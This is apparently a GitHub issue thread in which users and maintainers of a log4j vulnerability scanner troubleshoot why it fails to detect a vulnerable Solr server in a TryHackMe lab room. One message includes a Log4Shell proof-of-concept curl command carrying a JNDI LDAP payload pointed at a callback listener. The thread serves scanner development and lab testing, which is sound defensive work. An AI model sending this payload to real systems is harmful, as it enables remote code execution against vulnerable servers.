No callback from vulnerable Solar log4j

[dutz1e]

Hi,

As we talked earlier the scanner somehow does not seem to detect the vulnerable log4j Solar server in the Try Hack Me room Solar.
I ran the scan from my Kali box with the --debug option while having a netcat session from the Solar server to the ldap callback server.

log4jScanner-10_10_54_155__32-2021-12-21_171608.log

[GelosSnake]

What is the nature of the vulnerable server? Can you describe exactly how the vulnerability can be exploited in the hackme version? Please add more details so we can properly look into it and see if its in the scope of the scanner.

[xFreed0m]

Also, are you sure you can get a callback from the server and there isn't any FW in the way?
Also, is it running on a vulnerable web server in the ports scanned by the tool?

[dutz1e]

@GelosSnake The PoC is by making a curl request with a JNDI payload to a netcat listerner. You can validate it in detail by checking Task 4 - Proof of Concept in the room which is publicly available.

[dutz1e]

@xFreed0m No firewall in use. I can run a netcat session with response from the vulnerable system (vagrant@solar) to the LDAP server on port 5555 at my kali box (eth0 - 192.168.1.12 / tun0 10.14.9.194)

[xFreed0m]

Can you share log\screenshot of the curl command you used and the command used with the tool so we could compare?

[dutz1e]

Sure,

curl 'http://10.10.13.179:8983/solr/admin/cores?foo=$\{jndi:ldap://10.14.9.194:9999\}'

command to generate debug was ./log4jScanner-v0.3.1 scan --cidr 10.10.54.155/32 --ports=8983 --timeout=60 --debug

[xFreed0m]

I believe there is a different in results because the payload in curl is in the URL and in the tool it's currently in the useragent and a http header.
@guybarnhartmagen , i'm mistaken?

[guybarnhartmagen]

we also send in the URL

[guybarnhartmagen]

can you clarify what are the IP addresses involved?
Kali box, running the tool: 10.14.9.194
Solar server (possibly vulnerable): 10.10.13.179
192.168.1.12
10.10.103.12

i am trying to understand the screenshots you shared

[dutz1e]

Hi, 10.14.9.194 tun0 is the VPN address I received as VPN client from Try Hack Me 192.168.1.12 eth0 is my internal LAN ip 10.10.13.179 and 10.10.103.12 were the vulnerable log4j solar servers each time you start a room you start a new VM Sent with [ProtonMail](https://protonmail.com/) Secure Email. ‐‐‐‐‐‐‐ Original Message ‐‐‐‐‐‐‐ Op woensdag 22 december 2021 om 8:54 PM schreef Guy Barnhart-Magen ***@***.***>:

…

can you clarify what are the IP addresses involved? Kali box, running the tool: 10.14.9.194 Solar server (possibly vulnerable): 10.10.13.179 192.168.1.12 10.10.103.12 i am trying to understand the screenshots you shared — Reply to this email directly, [view it on GitHub](#129 (comment)), or [unsubscribe](https://github.com/notifications/unsubscribe-auth/ATI4PKSUPZXSD7KJ4DEICDLUSIUGNANCNFSM5KRHBMRA). Triage notifications on the go with GitHub Mobile for [iOS](https://apps.apple.com/app/apple-store/id1477376905?ct=notification-email&mt=8&pt=524675) or [Android](https://play.google.com/store/apps/details?id=com.github.android&referrer=utm_campaign%3Dnotification-email%26utm_medium%3Demail%26utm_source%3Dgithub). You are receiving this because you authored the thread.Message ID: ***@***.***>

[guybarnhartmagen]

hmm - this might be a networking issue. the VPN connection should be solid - but it might not be. in which case, we would not see the callback connection.

my only suggestions is to try and recreate this issue with a local vulnerable VM, or you can use the docker file in our repo to spin a vulnerable app yourself